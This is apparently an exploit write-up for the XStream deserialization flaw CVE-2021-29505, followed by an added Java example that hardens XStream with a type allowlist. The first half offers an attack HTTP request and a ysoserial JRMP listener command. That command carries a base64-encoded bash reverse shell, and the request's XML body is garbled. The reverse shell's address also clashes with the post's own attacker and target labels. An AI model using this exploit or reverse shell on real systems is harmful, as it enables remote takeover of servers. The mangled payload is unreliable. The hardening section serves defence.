# CVE-2021-29505 XStream deserialization command execution

Affected versions:

- XStream <= 1.4.16

exp:

```
Attacker machine: 192.168.20.128
XStream machine:  192.168.20.129

POST / HTTP/1.1
Host: 192.168.20.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3117

2
3
12345
com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content
12345
true SOAP_11
false
aa
aa
UnicastRef
192.168.20.128
1099
0
0
0
0
false
192.168.20.128 1099
```

Local RMI listener:

```
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOS8yMzMzMyAwPiYx}|{base64,-d}|{bash,-i}"
```
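The defensive counterpart to the request above, added here as an example and not part of the original post: the gadget chain only works because XStream will instantiate arbitrary JDK classes (the `Packet` and `UnicastRef` remnants visible in the payload) when the security framework is left on its default blocklist. Configuring XStream's own security framework as an allowlist rejects any element that names a class outside the application's DTOs before an object is created, independently of which blocklist entries a given version ships. The `Order` class, the `order` alias and the `com.example.dto` package are hypothetical stand-ins for the application's real types; the `XStream`, `NoTypePermission`, `NullPermission`, `PrimitiveTypePermission`, `allowTypes`, `allowTypesByWildcard` and `ForbiddenClassException` APIs are XStream's (1.4.x).

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

// Added example: an XStream instance that deserializes only the types the endpoint
// actually expects. Order is a hypothetical application DTO.
public class HardenedXStream {

    public static class Order {
        String id;
        int quantity;
    }

    public static XStream build() {
        XStream xstream = new XStream();

        // Start from "deny everything" instead of the default blocklist, then add back
        // only what a well-formed document needs: nulls, primitives/boxed types/String,
        // and the application's own classes.
        xstream.addPermission(NoTypePermission.NONE);
        xstream.addPermission(NullPermission.NULL);
        xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xstream.allowTypes(new Class[] { Order.class });
        // Alternatively, allow a whole DTO package (hypothetical package name):
        // xstream.allowTypesByWildcard(new String[] { "com.example.dto.**" });

        xstream.alias("order", Order.class);
        return xstream;
    }

    public static void main(String[] args) {
        XStream xstream = build();

        // Constructed benign input: resolves to the allowed Order class.
        String benign = "<order><id>12345</id><quantity>2</quantity></order>";
        Order order = (Order) xstream.fromXML(benign);
        System.out.println("parsed order " + order.id + " x" + order.quantity);

        // Constructed input naming one of the JDK classes seen in the payload above.
        // With the allowlist in place XStream refuses the type before instantiating it.
        String hostile = "<com.sun.xml.internal.ws.api.message.Packet/>";
        try {
            xstream.fromXML(hostile);
            System.out.println("UNEXPECTED: hostile type was accepted");
        } catch (ForbiddenClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Two points worth checking in a real code base: every `XStream` instance the application creates needs this configuration (a single unconfigured instance is enough to keep the endpoint exploitable), and from XStream 1.4.18 onward the library denies unconfigured types by default, so the explicit permissions above are what an upgrade would have enforced anyway.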

[@hatjwe](https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488482&idx=1&sn=453714065c200b8bfe15693c937bc336)
